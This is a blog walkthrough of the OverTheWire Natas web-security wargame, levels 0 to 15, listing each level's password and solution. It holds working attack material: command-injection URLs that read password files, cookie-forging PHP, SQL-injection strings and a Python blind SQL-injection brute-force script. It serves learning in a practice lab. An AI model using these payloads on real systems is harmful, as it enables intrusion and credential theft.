Please enable JavaScript to view the comments powered by Disqus. Natas - I4INFO

Natas

Solutions

Posted by Heeraj on January 22, 2016

If you like to read our old blogs you are welcome, I4INFO

I spent last day an hour or something on natas , the website would be very familiar to you. It was the website from which I first started to learn linux commands and the same people who run banditoverwire. Actually came to know from wechall.net, well that was also new to me :) But I could assure you that if you want to start with web exploitation as a CTF point of you, this is http://natas.natas.labs.overthewire.org very good option.

Natas 00

See the source code.

pass:gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas 01

Go to developer option by clicking F12

pass:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Natas 02

Goto files directory

pass:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas 03

Open the robots.txt you will get the file which contain pass to next level.

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas 04

Use a burp suite and change the referrer

Referer: http://natas5.natas.labs.overthewire.org/
pass:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas 05

You have to change the cookie of login from 0 to 1, using edit my cookie or firebug

pass:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas 06

You can easily get the secret using the page source, when you get the secret. Give a post request using secret and a submit. Write a script or use postman in chrome.

pass:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas 07

Remote file inclusion

pass:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas 08

Exploit

pass:W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas 09

Exploit

http://natas9.natas.labs.overthewire.org/?needle[]=ls&needle=;cat%20/etc/natas_webpass/natas10

Pass:nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas 10

There are exactly 2 ways to solve the challenge, one is going back to challenge 9 and entering ".* /etc/natas_webpass/natas11"

Solution 2 would be by using line feed you can observer we can execute the command and %20 for space. So the exploit look like this.

http://natas10.natas.labs.overthewire.org/?needle[]=.*%20/etc/natas_webpass/natas11&needle=%0acat%20.*%20/etc/natas_webpass/natas11
pass:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas 11

Getting the key


$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
$cookie = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D";
function xor_encrypt($in,$key) {
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i $outText .= $text[$i] ^ $key[$i % strlen($key)];
}

return $outText;
}
$key = xor_encrypt(json_encode($defaultdata), base64_decode($cookie));
echo $key;
echo "\n";

?>

Get the cookie

$defaultdata = array( "showpassword"=>"Yes", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = 'qw8J';
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i $outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
$newcookie = base64_encode(xor_encrypt(json_encode($defaultdata)));
echo " \n ------------------------------------\n";
echo " \n New cookie \n";
echo $newcookie;

echo " \n ------------------------------------\n";
?>

Add this cookie data

pass: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Natas 12

Upload burp and change the request of the file name.

pass: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Natas 13

exif_imagetype() reads the first bytes of an image and checks its signature.when you view the file you can see the first 4 character as that. So its gona bypass the exif_imagetype() as its only gona verify that it matches with the signature of jpg.

\xFF\xD8\xFF\xE8

pass : pass:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas 14

username = " or "1"="1
password = " or "1"="1

pass:pass:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas 15

#/usr/bin/python
__author__="hrj"

import requests
import string
import re

c = '1234567890' + string.ascii_lowercase + string.ascii_uppercase
password = ''

#To find the length of the database
print "------------------------------------------------------------------------"
print " Have patience , we will bring you the result "
print "------------------------------------------------------------------------"
'''
for i in range(1,50):
r = requests.get(('http://natas15.natas.labs.overthewire.org?username=natas16" AND (length(password)) ="'+str(i)), auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'))
res = r.text
#print res
tmp = re.findall("exists",res)
if tmp:
print "Length: " + str(i)
break
'''
#To find the password
for j in range(1,33):
for k in range(20,123):
r = requests.get(('http://natas15.natas.labs.overthewire.org?username=natas16" AND ascii(substr((password),'+str(j)+',1)) = "'+str(k)), auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'))
res = r.text
#`print res
tmp = re.findall("exists",res)
if tmp:
password+=chr(k)
print "Guess Pass = " + password
break

print "Last Result : " + password

Wait for the next blog, will be soon back!

Thank you for reading the blog!